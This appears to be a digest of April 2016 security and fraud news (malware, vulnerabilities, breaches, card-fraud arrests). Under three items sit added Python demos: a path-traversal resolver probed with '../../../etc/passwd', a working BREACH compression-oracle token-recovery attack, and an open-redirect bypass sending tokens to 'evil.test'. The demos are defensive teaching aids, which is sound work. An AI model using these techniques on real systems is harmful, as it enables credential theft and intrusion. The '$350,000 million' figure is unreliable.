Western Digital user data exposed by DNS issue. A security researcher discovered that a Western Digital (WD) nameserver supporting the company’s My Cloud NAS products was not configured properly and exposed a Domain Name System (DNS) flaw that could have been exploited by an attacker to conduct a zone transfer and obtain the zone file, which can contain user data valuable to attackers seeking to exploit a zero-day vulnerability in the products. WD corrected the faulty configuration after scanning all its servers and reviewing the architecture and processes in place for modifying the configuration of its nameservers.

4/18/16 

SEC case freezes assets of ski resort steeped in fraudulent EB-5 offerings. The U.S. Securities and Exchange Commission charged two owners of Jay Peak Inc., and its eight business partners for conducting a Ponzi-like fraud scheme April 14 after the group misused more than $350,000 million, which was raised through investments and solicited under the EB-5 Immigrant Investor Program by using the funds for personal expenses and other-than-stated purposes while omitting key information and making false statements to investors in an effort to construct ski resort facilities and a biomedical research facility in Vermont. 

9 charged in alleged San Jose car insurance fraud ring. The Santa Clara County District Attorney’s Office reported April 13 that a San Jose body shop manager, his girlfriend, and seven other body shop owners were charged with insurance fraud after the group allegedly made more than $140,000 by filing false insurance claims following the group’s fabrication of over 20 vehicle accidents listed under counterfeit names from 2011 – 2015. The group purchased the insurance policies days before each incident and purposely damaged each car to file claims with several insurance companies.

Hybrid trojan “GozNym” targets North American banks. Researchers from IBM Security discovered a hybrid trojan, dubbed “GozNym,” which was reported to be similar to the Nymaim dropper and the Gozi financial malware, leverages Nymaim dropper’s stealth and persistence while adding trojan capabilities from Gozi’s ISFB parts to facilitate fraud via infected Internet browsers. The trojan is believed to have stolen millions of dollars from victims, targeting 22 financial institutions in the U.S. and Canada including banks, credit unions, e-commerce platforms, and retail banking. 

No patches for QuickTime Flaws as Apple ends support on Windows. ZDI reported that Apple will no longer release security updates for Windows versions of QuickTime after a security researcher from Source Incite found a heap corruption vulnerability that could allow an attacker to achieve remote code execution (RCE) once a victim accesses a maliciously crafted Web site or file. Apple released instructions on how to remove QuickTime for Windows and advised users to remove legacy plugins to improve their personal computer (PC) security.

Google, Microsoft address problems in their URL shorteners. An independent security researcher and a professor at Cornell Tech discovered that the Uniform Resource Locator (URL) shortening services used by Google and Microsoft employ short random character tokens that can allow an attacker to reach potentially private files holding sensitive information using brute-force attacks. The researchers found the flaw after beginning a series of automated scans on Microsoft’s 1drv.com and finding it exceptionally easy to brute-force its small 6-character URLs.

Clever techniques help malware evade AV engines. Security researchers from FireEye released a study titled, Ghost in the Endpoint which revealed that various components of malware went undetected for an extended period of time by antivirus programs including a backdoor dubbed “GOODTIMES,” which was left undetected due to its disguise as an Excel file (XLSX) while leveraging a Flash Player exploit. 

Lizard Squad downs Blizzard servers with massive DDoS attacks. A Blizzard spokesman reported that its European and U.S. servers that host games such as World of Warcraft, Diablo 3, and Starcraft 2 experienced connectivity and latency issues for several hours April 14 following a potential distributed denial-of-service (DDoS) attack allegedly conducted by the Lizard Squad hacking group. Blizzard technical support was working to mitigate the impact of the attacks.

Microsoft issues optional Windows update to fix MouseJack vulnerability. Microsoft released its monthly security updates addressing several vulnerabilities including a flaw dubbed MouseJack, after security researchers from Bastille found that an attacker could spoof data from a wireless device and force the Universal Serial Bus (USB) dongle to send fraudulent instructions to the connected personal computer (PC) and execute malicious actions.

4/14/16 

Adobe patches flaws in Creative Cloud, RoboHelp. Adobe released Creative Cloud version 3.6.0.244, which patched an important vulnerability in the sync process that affected Creative Cloud Libraries version 3.5.1.209 and earlier versions, as well as a security hotfix for RoboHelp Server version 9, which patched a critical vulnerability linked to the Structured Query Language (SQL) queries that could lead to information disclosure, among other patched vulnerabilities. 

Another IBM Java patch bypassed by researchers. Researchers from Security Explorations discovered that IBM’s patch for Java’s “issue 70” was ineffective and could be easily bypassed and exploited for a complete sandbox escape against Java versions 7 and 8, because the patches did not address the root causes of the vulnerabilities or introduce security checks into the code. Security Explorations published a report describing how IBM’s patch can be bypassed and released Proof-of-Concept (PoC) code for the flaw.

Links found between different ransomware families. Researchers from AlienVault released a report addressing several similarities between PowerWare and PoshCoder ransomware including the use of the RijndaelManaged class and that both ransomware encrypt the same file types, which suggests that the two threats are connected. In addition, the report stated several similarities between Rokku and Chimera ransomware including the use of the ReflectiveLoader function, which is used in both ransomware for reflective dynamic link library (DLL) injection to load a library from memory into a host process. 

Over half a billion personal records were stolen or lost in 2015. Symantec Corporation released a report which stated that in 2015 many companies avoided disclosing the full details of their data breaches after researchers found that over 429 million records were lost or stolen and that data breaches grew by 85 percent compared to data breaches in 2014. In addition, the report stated that 75 percent of popular Web sites had major vulnerabilities; of which, 15 percent were considered as critical flaws. 

Improved Qbot worm targets public institutions. Researchers from BAE Systems discovered that an improved version of the Qbot malware was targeting public organizations such as police departments, hospitals, and universities after finding that the malware’s developers had made several improvements to avoid detection and that more than 54,000 international machines were part of the botnet, with 85 percent of infections listed in the U.S. Researchers noted that cyber attackers distributed the Qbot malware via compromised Web sites that lead to the RIG exploit kit (EK).

4/13/16 

Goldman Sachs agrees to pay more than $5 billion in connection with its sale of residential mortgage backed securities. The U.S. Department of Justice announced April 11 that Goldman Sachs Group, Inc., agreed to pay a total of $5.06 billion to settle charges related to the firm’s conduct in the packaging, securitization, marketing, sale, and issuance of residential mortgage-backed securities from 2005-2007 after the firm falsely assured prospective investors that the securities it sold were backed by sound mortgages, thereby causing billions of dollars in losses to financial institutions. As part of the settlement, Goldman Sachs must pay a civil penalty, provide monetary relief to homeowners and distressed borrowers, and pay a fine to settle claims with other Federal and State entities, among other requirements. 

Wells Fargo admits deception in $1.2 billion U.S. mortgage accord. The U.S. Department of Justice announced April 8 that it reached a $1.2 billion settlement with Wells Fargo & Company and resolved claims with a former vice president after the bank admitted to falsely certifying that many of its home loans qualified for Federal Housing Administration insurance from 2001-2008, and to failing to file timely reports on several thousand loans with material defects from 2002-2010. The agreement also resolved claims by Federal prosecutors in California that Wells Fargo-owned American Mortgage Network, LLC allegedly issued false loan certifications.

Ramdo Click-Fraud malware continues to evolve. Security researchers from Dell SecureWorks and Palo Alto Networks released an analysis on the Ramdo click-fraud malware, also known as Redyms, which stated that the Ramdo malware was capable of downloading and installing additional malicious software on infected devices after it tricks users into selecting an online ad from other infection systems. The report stated that while the malware was not very sophisticated, its operators were actively working on implementing new features and methods to avoid detection and prevent analysis. 

WordPress.com pushes free HTTPS to all hosted sites. WordPress reported that it will host all free Hypertext Transfer Protocol Secure (HTTPS) traffic for all custom domains including blogs and Web sites which will ensure users are provided with only secured, HTTPS traffic. 

Malware found in IoT cameras sold by Amazon. The co-founder of Proctorio discovered that a set of security cameras sold from Amazon.com, Inc., were infected with malware after finding that an iframe, brenz_pl/rc/, was linked to a malicious Web site when connecting to a personal computer that could potentially allow attackers remote control, remote access, and to control components in a targets’ home. 

“ID Ransomware” website helps identify ransomware infections. An independent security researcher launched a new Web site named ID Ransomware that will help ransomware victims recover their encrypted files without paying the ransomware fee by allowing users to upload their encrypted files to the Web site where a thorough analysis will be conducted to notify victims which ransomware variant has locked their computers or files. Once the Web site detects the ransomware type, users will receive a link to download a decrypter to unlock encrypted files. 

Jigsaw ransomware threatens to delete your files, free decrypter available. Security researchers from @MalwareHunterTeam discovered a new ransomware dubbed Jigsaw was infecting computers with an unknown infection method and threatening victims to pay the ransomware fee by targeting 226 different file types, encrypting each file with an Advanced Encryption Standard (AES) algorithm, and adding the .fun extension at the end of each file name. Researchers advised victims to download the JigSawDecrypter to decrypt locked files. 

Google improves safe browsing for Network Admins. Google reported that it made improvements to its Safe Browsing Alerts for Network Administrators service that will inform administrators about Uniform Resource Locators (URLs) related to malicious software, potentially unwanted programs (PUPs), and social engineering, as well as inform them about compromised pages on their networks that can allegedly harm users via drive-by downloads or exploits.

4/12/16

Petya ransomware unlocked, you can now recover password needed for decryption. Two security researchers discovered ways to help victims of the Petya ransomware retrieve locked files and unlock computers after one researcher created two Web sites where victims can obtain the decryption password, and another researcher from Emsisoft created a tool that can help generate passwords needed to unlock victims’ computers.

Nuclear exploit kit uses Tor to download payload. Researchers from Cisco discovered that the Nuclear exploit kit (EK) was dropping a Tor client file, named “tor.exe”, for Microsoft Windows to execute a request via the Tor anonymity network to download a secondary payload as several domains listed in the network traffic of the Nuclear exploit kit (EK) were never registered and were not associated with any Domain Name System (DNS) traffic. Researchers noted that as attackers used Tor to download a second payload, the malware was more difficult to track back to its hosting system.

CryptoHost ransomware locks your data in a password-protected RAR file. Security researchers from MalwareForMe, MalwareHunterTeam, Bleeping Computer, and an independent researcher discovered a way to recover RAR files locked by the CryptoHost ransomware after an analysis of the ransomware revealed it was using a combination of the user’s ID number, the motherboard serial number, and the C:\ volume serial number to generate a Secure Hash Algorithm 1 (SHA-1) hash, which was used as both the RAR file’s name and the file’s password. Researchers stated victims will need to open the Windows Task Manager, find the cryptohost.exe process, stop its execution, and unzip the RAR file.

Cisco releases critical security updates. Cisco released six security advisories including a high impact vulnerability in the Web application programming interface (API) of the Cisco Prime Infrastructure and Evolved Programmable Network Manager (EPNM) that could allow an attacker to send a crafted Uniform Resource Locator (URL) request to bypass role-based access control (RBAC) and gain elevated privileges, as well as a vulnerability in the TelePresence Server that could allow an attacker to cause a kernel panic and reboot the device, among other vulnerabilities.

4/11/16

Vacaville police seize 170 fake credit cards in ID theft bust. A San Francisco resident was arrested April 4 after police found 170 fraudulent cards under 7 different names, $600 in cash, and several drivers’ licenses in the suspect’s possession when he was apprehended for making more than $2,000 in fraudulent purchases at the Vacaville Premium Outlets. An investigation into the extent of the fraudulent activity is ongoing.

Florida man suspected of $200k in fraudulent purchases across U.S. arrested in Missoula. A Florida resident suspected of using counterfeit credit cards to make $200,000 worth of fraudulent purchases at stores in over 20 States was arrested in Missoula, Montana, April 4 after a loss prevention officer at the Sportsman’s Warehouse alerted police that the suspect was in the store. A search of the suspect reportedly revealed 13 credit cards and the investigation is ongoing.

22 face charges in Miami drug money-laundering ring involving ‘El Chapo’ cartel. Miami-Dade authorities announced arrest warrants April 7 for 22 people who are suspected of laundering around $1 million in illegal drug profits each month through nearly a dozen Miami businesses prior to sending the money to Colombia. The arrests are part of “Operation Neymar,” a 2-year investigation run by DHS, Miami police, and Florida State prosecutors that probes into the black market peso exchange and monitors deals in 17 countries.

Miami couple charged with $2 million identity theft fraud, authorities say. The Manhattan District Attorney’s office announced April 5 charges against a Miami couple for allegedly running a $2 million credit card fraud and identity theft scheme where the duo and co-conspirators stole personal information from over 40 victims to open credit cards, which they had shipped to locations all over the U.S. Authorities found dozens of credit cards under different names, forged identification and licenses, and a credit card encoder, among other illicit materials at multiple Miami addresses associated with the couple.

Security experts crack Dridex admin panel, recover victim data. Security researchers from buguroo reported that they were able to retrieve victim data and analyze Dridex’s activity, to help mitigate future attacks, after finding the Internet Protocol (IP) address of one of the Dridex admin panels, known as Subnet 220, hardcoded in the malicious JavaScript files. Subnet 220 was running an older, previously analyzed version of the Dridex backend, which allowed the researchers to open its admin panel and study its operations.

Ubuntu patches several kernel vulnerabilities. Ubuntu released patches addressing several Linux kernel vulnerabilities in its 14 and 15 releases, including a use-after-free flaw that a local attacker could exploit to crash the system and potentially execute arbitrary code, a timing side channel that an attacker could exploit to compromise system integrity, and a denial-of-service (DoS) flaw that could allow an unauthenticated attacker to exhaust resources and force a DoS condition, among other flaws.

Adobe patches Flash zero-day exploited by Magnitude EK. Adobe released an update for its Flash Player products that patched a zero-day vulnerability, a memory corruption flaw exploitable for remote code execution, after a Proofpoint researcher noticed changes in the Magnitude exploit kit (EK) and, on further investigation, found attackers using the EK to deliver threats such as Cerber and Locky ransomware.

Authorities shut down botnet of 4,000 Linux servers used to send spam. ESET reported that a joint effort with CyS Centrum LLC and the Cyber Police of Ukraine shut down the six-year-old Mumblehard botnet after researchers pinpointed the true command and control (C&C) server when the Mumblehard operators began making changes to their malware’s code. Authorities seized the server’s Internet Protocol (IP) address and transferred it to a security firm, which now runs a sinkhole that absorbs all requests from Mumblehard-infected machines.

4/8/16 

Police: 3 people arrested for credit card scam, over 250 counterfeit credit/debit cards found. Two California men and a New Jersey woman were arrested and charged April 4 in Nashua, New Hampshire, after authorities found over 250 counterfeit credit and debit cards, more than 20 gift cards, and receipts originating from North Carolina in the trio’s vehicle. A subsequent search of the group’s two hotel rooms in Tewksbury, Massachusetts, revealed a laptop computer, a card reader and coder, a box of blank cards, and a large quantity of gift cards. 

Google reCAPTCHA cracked in new automated attack. Three security researchers developed an automated attack that bypasses the security measures of Google’s reCAPTCHA and Facebook’s CAPTCHA systems by using machine learning to solve their image challenges, achieving a 70.78 percent success rate in a study of 2,235 CAPTCHAs. The attack is more accurate than previously reported methods and could potentially be replicated by malicious hackers. 

OSVDB shut down permanently. Leaders of the Open Sourced Vulnerability Database (OSVDB) reported that its database will be shut down permanently due to the lack of support and contribution from the Information Technology (IT) industry. The project’s blog will remain active to help provide commentary on items related to the vulnerability world. 

Police raids target cyber-criminals in four countries: Germany. Approximately 700 international police officers participated in coordinated multi-national raids in the Netherlands, France, Canada, and Germany to arrest globally active hackers and a variety of Internet criminals that offered illicit services such as disguising malware from anti-virus programs to steal online passwords and banking information, among other actions. Officials reported that they arrested a chief suspect and confiscated about 300 computers and disks. 

Vulnerabilities continue to plague industrial control systems. The DHS Industrial Control Systems-Computer Emergency Readiness Team (ICS-CERT) released three security advisories on industrial control systems (ICS) that detailed vulnerabilities originally found and reported by independent researchers. The advisories indicated that critical infrastructure and industrial networks were still inundated with serious flaws. 

Hackers will break into email, social media accounts for just $129. Dell SecureWorks released a report on the underground hacker market, where customers hire hackers to compromise accounts, which found that compromising a personal Gmail, Hotmail, or Yahoo account costs as little as $129, while compromising a corporate email account costs about $500. The report also found that the underground market offers a wide range of other hacking services, including attacks against the commercial facilities, transportation, and financial sectors, among others.

4/7/16 

Minister convicted in $5 million tax scam. A traveling minister from Arkansas was convicted April 5 for his role in a nearly $5 million fraudulent tax return scheme where he and a co-conspirator allegedly filed over 2,700 fraudulent tax returns on behalf of church members in Ohio and other States after obtaining church members’ personal information by claiming to help the members procure government stimulus funds. The minister and co-conspirator took fees from each tax refund while congregants received the balance. 

Serial ‘bandage’ bank bandit. The FBI announced a search April 5 for a bank robber dubbed the “Bandage” who robbed a Sandy Spring Bank branch in Burtonsville and a Capital One Bank branch in Elkridge April 1. Authorities stated that the man is suspected of robbing seven other banks in Maryland since October 2015. 

Windows’ Pirrit adware ported to OS X via Qt Framework. A security researcher from Cybereason discovered that OSX/Pirrit, a port of the Windows Pirrit adware, was infecting Apple Mac users for the first time and hijacking their Web traffic to inject ads. The port was made possible by the Qt Framework, which lets programmers write applications that run on Apple Mac, Linux, and Microsoft Windows systems. The malware uses several steps to infiltrate a system after a user launches a Pirrit-laced binary. 

Adobe to patch actively exploited Flash zero-day. Adobe reported April 5 that it would release a patch April 7 for Flash Player 21.0.0.197 and earlier versions to address a zero-day vulnerability that attackers were actively exploiting. In the meantime, customers were advised to ensure their Flash Player was updated to version 21.0.0.182 or later, which includes a mitigation that blocks the exploit seen in the wild. 

New Locky variants change communication patterns. Researchers from Check Point discovered that Locky, a prominent ransomware family, had changed its distribution mechanism to use JavaScript (.js) attachments for malware distribution and that another Locky variant was included as the malicious payload in the Nuclear exploit kit (EK) with additional communication changes. In addition, FireEye Labs researchers found that the ransomware was increasing its infection rate and surpassing the Dridex spam activities.

4/6/16 

Two former senior executives of global financial services company charged in scheme to defraud clients through secret trading commissions on billions of dollars in securities trades. Two former executives of a Boston-based financial services company were charged in an indictment unsealed April 5 for their roles in a scheme where the duo and co-conspirators allegedly added secret commissions to billions of dollars of fixed income and equity trades performed for at least six clients of the bank’s transition management business, thereby overcharging the clients by millions of dollars. The indictment also alleges that from February 2010 to September 2011 the pair took action to hide the commission from the clients and other bank employees. 

Researchers bypass patch for old IBM Java flaw. The founder and chief executive officer (CEO) of Security Explorations reported that a sandbox escape vulnerability in IBM Java, which was previously patched in 2013, could still be exploited by attackers after discovering the flaw could be abused by making minor modifications to the proof-of-concept (PoC) code published by the company in July 2013. A patch has yet to be released, but IBM was working to release a fix. 

Top Firefox extensions can hide silent malware using easy pre-fab tool. Two U.S. security researchers reported at the Black Hat Asia 2016 security conference that Mozilla Firefox extensions are open to extension-reuse attacks: a malicious add-on can exploit weaknesses in the structure of Firefox extensions to invoke the functionality of other, legitimate extensions installed on the machine, disguising malicious activity as legitimate functionality and passing both automated and human review. 

Path traversal flaw found in ICONICS WebHMI. A German researcher discovered that ICONICS’ WebHMI product was affected by a directory traversal flaw that could allow a remote attacker to read configuration files, including ones storing password hashes and other sensitive information, by sending a crafted request to an Internet-exposed WebHMI installation. ICONICS had not released a patch and advised users not to expose the product to the Internet. 
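
The check a Web HMI, or any endpoint that serves files by name, needs in order not to fall to this class of flaw, shown as an added example (not ICONICS’ code; the web root and file names are constructed). The weak version joins the requested name onto the web root and trusts it; the hardened version decodes once, rejects NUL, backslash and still-encoded input, and rebuilds the path from vetted segments:

```python
import posixpath
from urllib.parse import unquote

WEBROOT = "/var/www/webhmi"   # constructed web root, not a real product path


def vulnerable_resolve(webroot: str, requested: str) -> str:
    """The weak pattern: decode the request path, glue it onto the web root
    and trust the result. '..' segments (or an absolute path) walk out of the
    root, so a request for ../../../etc/passwd resolves to /etc/passwd."""
    return posixpath.normpath(posixpath.join(webroot, unquote(requested)))


def safe_resolve(webroot: str, requested: str) -> str:
    """Lexical hardening: decode exactly once, reject anything that could change
    meaning downstream, then rebuild the path from vetted segments only."""
    path = unquote(requested)
    if "\x00" in path or "\\" in path:
        # NUL truncates C strings; backslash is a separator to some consumers.
        raise PermissionError(f"rejected path: {requested!r}")
    if "%" in path:
        # Still encoded after one decode (e.g. %252e): a double-encoding attempt.
        # Deliberately strict; it also refuses legitimate names containing '%'.
        raise PermissionError(f"rejected path: {requested!r}")
    segments = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue                    # leading '/', '//' and '.' are harmless
        if seg == "..":
            raise PermissionError(f"traversal attempt: {requested!r}")
        segments.append(seg)
    return posixpath.join(webroot, *segments)


def rejects(webroot: str, requested: str) -> bool:
    """True if the hardened resolver refuses the request."""
    try:
        safe_resolve(webroot, requested)
    except PermissionError:
        return True
    return False


if __name__ == "__main__":
    for req in ("config/users.xml", "../../../etc/passwd", "%2e%2e/%2e%2e/%2e%2e/etc/passwd"):
        print(f"{req:40} weak -> {vulnerable_resolve(WEBROOT, req)}  "
              f"hardened -> {'REJECT' if rejects(WEBROOT, req) else safe_resolve(WEBROOT, req)}")
```

Rejecting any ".." segment outright is simpler and safer than normalising and then comparing prefixes, which is where realpath-based checks go wrong on symlinks and on roots that are themselves prefixes of other directories.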

HTTP compression continues to put encrypted communications at risk. Security researchers from the National Technical University of Athens reported at the Black Hat Asia 2016 security conference that they had improved the Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext (BREACH) attack to make it practical against Transport Layer Security (TLS) connections using block ciphers such as the Advanced Encryption Standard (AES), which the original attack handled poorly because block padding obscures the one-byte length differences it depends on. The attack requires intercepting the victim’s Web traffic, for example through a router on a wireless network the attacker controls. 
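
The attack works because HTTP compression (deflate/gzip) runs before encryption, so the ciphertext length reveals how well attacker-supplied text matched a secret elsewhere in the same response. The Python below is added here as an illustration and is not the researchers’ tool: it builds that oracle against a constructed page, first in the stream-cipher setting (compressed length visible byte for byte) and then with the length rounded up to 16-byte blocks as an AES-CBC record would be, which the attacker undoes with filler bytes. The page, the secret token, the hex alphabet, the simplified record model (no MAC or padding-length byte) and the use of fixed Huffman codes are all assumptions made for the demo:

```python
import math
import zlib

# Constructed target: a page that carries a secret (an anti-CSRF token) and also
# reflects an attacker-controlled query string, both inside one compressed body.
SECRET = "csrf=7f3a9c1e"         # constructed secret; the attacker knows only "csrf="
ALPHABET = "0123456789abcdef"    # constructed: token characters are lowercase hex
PAD = "ABCDEFGHIJKLMNOP"         # filler absent from the page, so each byte stays a literal


def render(reflected: str) -> bytes:
    """The victim application's response body (constructed, not a real site).
    The reflected value is kept at the end so nothing after it can form a back-
    reference whose cost depends on the guess; that keeps the toy oracle exact."""
    return (
        "<html><head><title>search</title></head><body>\n"
        f'<form><input type="hidden" name="t" value="{SECRET}"></form>\n'
        f"<p>you searched for: {reflected}</p>\n"
    ).encode()


def compressed_len(body: bytes) -> int:
    """HTTP compression (deflate). Fixed Huffman codes make this toy oracle exact:
    a wrong guess costs one literal (8 bits) more than a right guess. Real servers
    use dynamic codes, which only blur the signal; it is still there."""
    c = zlib.compressobj(9, zlib.DEFLATED, 15, 8, zlib.Z_FIXED)
    return len(c.compress(body) + c.flush())


def observed_len(reflected: str, block: int = 1) -> int:
    """What someone on the network path sees: the compressed length rounded up to
    the cipher block size. block=1 models a stream cipher (the original BREACH
    setting); block=16 models an AES-CBC record (simplified: MAC bytes omitted)."""
    return math.ceil(compressed_len(render(reflected)) / block) * block


def exact_len(reflected: str, block: int) -> int:
    """Undo block rounding: append 1..block filler bytes and note when an extra
    block appears. Each filler byte costs exactly one compressed byte, so the
    point where the record grows pins down the exact underlying length."""
    base = observed_len(reflected, block)
    for p in range(1, block + 1):
        if observed_len(reflected + PAD[:p], block) > base:
            return base - p + 1
    raise RuntimeError("block size larger than available filler")


def recover_token(prefix: str, length: int, block: int = 1) -> str:
    """Guess the token one character at a time. Only the last three known bytes
    are reflected with each guess: that is enough context for deflate to match
    against the secret, and keeping the match at 3 vs 4 bytes stays clear of the
    length codes' extra-bit thresholds, so a right guess is always exactly one
    compressed byte shorter than a wrong one."""
    known = prefix
    for _ in range(length):
        context = known[-3:]
        sizes = {c: exact_len(context + c, block) for c in ALPHABET}
        smallest = min(sizes.values())
        winners = [c for c, n in sizes.items() if n == smallest]
        if len(winners) != 1:
            raise RuntimeError(f"ambiguous oracle after {known!r}: {winners}")
        known += winners[0]
    return known


if __name__ == "__main__":
    print("stream cipher :", recover_token("csrf=", 8))
    print("AES-CBC record:", recover_token("csrf=", 8, block=16))
```

With block=16 the naive comparison of record sizes fails (every guess lands in the same 16-byte bucket); the filler loop is the deterministic toy version of what the Athens researchers do statistically against real TLS, where MAC and padding bytes add noise the attacker has to average out. The defence is the same either way: do not compress responses that mix secrets with reflected input, or mask the secret per request.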

Chrome extension caught hijacking users’ browsers. Google reported that it banned the Better History Chrome extension from its Web Store after users reported that the extension redirected them through an extra Hypertext Transfer Protocol (HTTP) link to an additional Web page showing several types of advertisements. That page also collected analytics on users, which could later be sold to advertisers. 

Google fixes another 40 security bugs in Android’s April update. Google released an Android Security Advisory patching 40 security flaws including 15 critical bugs in Android devices running versions 4.4.4 and higher, that could have allowed an attacker to root and permanently compromise the device. In addition, multiple remote code execution (RCE) flaws were patched in Dynamic Host Configuration Protocol Client Daemon (DHCPCD) service, Media Codec, Mediaserver component, and the libstagefright library, among other patched vulnerabilities. 

iOS app patching tool “rollout” prone to abuse. Security researchers from FireEye reported that Rollout.io, another quick-patching solution for Apple iOS applications, which runs on an estimated 35 million devices, could be abused by malicious hackers: a malicious third-party advertising software development kit (SDK) integrated into a legitimate app could use the patching channel to turn a harmless iOS app into malware.

4/5/16 

Thousands of cards compromised in ATM scam. Authorities announced April 1 that a man was charged after he allegedly placed skimming devices on Wells Fargo ATMs throughout San Diego County, compromising at least 4,870 credit and debit cards with losses exceeding $428,000 through the use of counterfeit cards. The man also withdrew money from customer accounts, purchased merchandise from local Walmarts, and transmitted over $114,000 in funds via MoneyGrams to Jordan, Belgium, China, Bulgaria, and Moldova. 

Elusive Midday Bandit robs 11th bank: FBI. The FBI is searching for a man dubbed the “Midday Bandit” who is suspected of robbing the MB Financial Bank branch in Oak Lawn, Illinois, March 31. Authorities stated that the man is suspected of robbing 10 other Chicago-area banks since June 2014. 

Ex-furniture company exec pleads guilty in $18M loan fraud. The former chief financial officer (CFO) of New Jersey-based Munire Furniture Inc., and an affiliated Indiana company pleaded guilty to Federal charges April 1 after the CFO falsified the companies’ financial conditions by inflating sales and revenue numbers beginning in 2011 in order to get $17 million in loans from a Manhattan bank and $1 million in municipal loans from Gas City, Indiana, so the companies could continue business. Officials stated that the companies defaulted on the $18 million loans. 

Authentication flaw in Microsoft accounts gets researcher $13,000 reward. Microsoft patched a cross-site request forgery (CSRF) flaw in its main authentication system after a security researcher found that, because of improper input filtering on the “wreply” Uniform Resource Locator (URL) parameter, an attacker could alter “wreply” so that a victim’s authentication tokens were sent to an attacker-controlled Web site, giving the attacker access to the victim’s Azure, Outlook, and Office accounts. 
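
The “wreply” class of bug is an open redirect on the reply URL: the identity provider appends a token to a URL the request supplies, and the check on that URL is loose enough that an attacker’s host passes. As an added example that has nothing to do with Microsoft’s actual code, the Python below puts a substring-style check beside a strict allowlist check and shows where the token ends up under each. The hostnames, parameter names, token and bypass URLs are constructed:

```python
from typing import Optional
from urllib.parse import urlencode, urlsplit

# Constructed allowlist: the only hosts this identity provider may hand tokens to.
ALLOWED_REPLY_HOSTS = {"login.example.com", "mail.example.com", "account.example.com"}


def weak_reply_url_ok(url: str) -> bool:
    """What 'improper input filtering' on a reply URL usually looks like: a
    substring test on the raw string. Every URL in BYPASSES passes it."""
    return url.startswith("https://") and "example.com" in url


def strict_reply_url_ok(url: str) -> bool:
    """Parse first, then require https and an authority component that is exactly
    one allowlisted host: no userinfo, no port, no look-alike suffixes."""
    parts = urlsplit(url)
    return parts.scheme == "https" and parts.netloc.lower() in ALLOWED_REPLY_HOSTS


def issue_token_redirect(wreply: str, token: str, check=strict_reply_url_ok) -> Optional[str]:
    """Where a signed-in user is sent, carrying the token, after authentication.
    Returns None when the reply URL is refused."""
    if not check(wreply):
        return None
    sep = "&" if "?" in wreply else "?"
    return f"{wreply}{sep}{urlencode({'token': token})}"


def token_recipient(wreply: str, token: str, check=strict_reply_url_ok) -> Optional[str]:
    """Host that ends up holding the token, or None if the redirect is refused."""
    location = issue_token_redirect(wreply, token, check)
    return None if location is None else urlsplit(location).hostname


# Constructed attacker-supplied reply URLs; evil.test is the attacker's host.
BYPASSES = (
    "https://login.example.com.evil.test/cb",        # allowlisted name as a subdomain label
    "https://evil.test/cb?next=login.example.com",    # allowlisted name only in the query
    "https://login.example.com@evil.test/cb",         # allowlisted name as userinfo
    "https://evil.test/login.example.com/cb",         # allowlisted name in the path
)


if __name__ == "__main__":
    for url in BYPASSES:
        print(f"{url:48} weak -> {token_recipient(url, 't0k3n', weak_reply_url_ok)}  "
              f"strict -> {token_recipient(url, 't0k3n')}")
```

Comparing the parsed authority against an exact allowlist is the minimum; a tighter design registers full reply URLs per relying party and refuses anything that is not byte-for-byte one of them, so the token can never be attached to a URL the provider has not seen before.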

Romanian hacker “Guccifer” appears in U.S. court. A Romanian national was extradited to the U.S. for a period of 18 months after U.S. authorities stated the man allegedly hacked into the email and social media accounts of two former presidents, a former cabinet member, a former presidential advisor, and a former member of the U.S. Joint Chiefs of Staff, among other people, and released victims’ personal information including private emails, personal photographs, and medical and financial data from December 2012 – January 2014. 

Hackers can unlock any HID door controller with one UDP packet. A security researcher from Trend Micro discovered a design vulnerability in HID Global’s door controllers, specifically the VertX and Edge products, that allows an attacker to unlock a door and/or deactivate its alarm by sending a single malicious User Datagram Protocol (UDP) request. Both product lines run a discovery daemon, discoveryd, that answers UDP packets on port 4070 with information about the device; because the daemon passes parts of the request to the operating system without sanitizing them, an attacker can execute remote commands on the device with root privileges.

4/4/16 

Four arrested in Calhoun County for allegedly possessing over 100 fraudulent credit cards. Authorities from the Calhoun County Sheriff’s Office in Michigan announced April 1 that 4 Chicago-area residents were arrested the week of March 28 after police found about 150 fraudulent credit cards from other countries in the group’s vehicle. Police were alerted to the suspects’ vehicle after a gas station attendant notified the police about possible credit card fraud. 

200 fake credit cards set off bomb detector at Midway, prosecutors say. Officials at Chicago Midway International Airport discovered a total of 200 fraudulent gift cards and debit cards March 29 after the cards’ magnetic stripes triggered a bomb detector at airport security. Authorities stated that the fraudulent cards were found wrapped in shoes and socks. 

Code execution flaw found in Lhasa decompression library. Lhasa released version 0.3.1 of its open source LZH/LHA decompression tool and library, fixing an integer underflow vulnerability found by Cisco Talos researchers. An attacker could exploit the flaw for arbitrary code execution by tricking a victim into opening a specially crafted archive, or through file-scanning systems that use the vulnerable library to read the contents of LZH and LHA files. 

Rokku ransomware uses QR codes to help you pay for your files. Security researchers from Avira discovered a new ransomware named Rokku that is distributed via spam emails carrying malicious attachments; when an attachment is opened it executes the ransomware, which encrypts the victim’s files, appends the “.rokku” extension to them, and presents a QR code to make paying the ransom easier. 

SideStepper attack targets corporate iOS devices. Security researchers from Check Point discovered a new attack method, dubbed SideStepper, that targets Apple iOS devices used in enterprise environments and enrolled in Mobile Device Management (MDM) setups. The attacker sends the device a malicious configuration profile via email, instant messaging (IM), or short message service (SMS); once the user installs it, the profile enables a trivial man-in-the-middle (MitM) attack on the device’s MDM traffic, through which the attacker can push malicious apps signed with a legitimate enterprise certificate, bypassing iOS security protections.

4/1/16 

Police bust major credit card fraud operation. Officials from the Atlanta Police Department and the U.S. Secret Service are investigating a half-million dollar credit card fraud operation after Atlanta police discovered approximately 366 fraudulent credit cards with different numbers, multiple credit card-making machines, and $330,000 worth of computers in an Atlanta apartment March 30. Officials stated the suspects allegedly purchased computers at Best Buy with the fraudulent credit cards and sold the devices internationally, and that they committed fraud using aliases at banks in the U.S., Germany, Denmark, and the Bank of China. 

California wholesale executive pleads guilty for role in $9 million bank fraud scheme. The former vice president of Eastern Tools and Equipment, Inc., in Ontario, California, pleaded guilty March 30 to Federal charges after he and co-conspirators defrauded East West Bank in Pasadena of $9 million from 2007 – 2012 by making material misrepresentations to the bank about the company’s accounts receivable and financial statements, creating shell corporations to act as suppliers and retailers doing business with Eastern Tools, and defaulting on the promissory note issued by the bank. Officials stated that the executive and his co-conspirators prolonged the scheme by opening post office boxes, phone accounts, and email accounts claiming to be associated with the shell retail companies in order to make them appear as independent entities to East West Bank. 

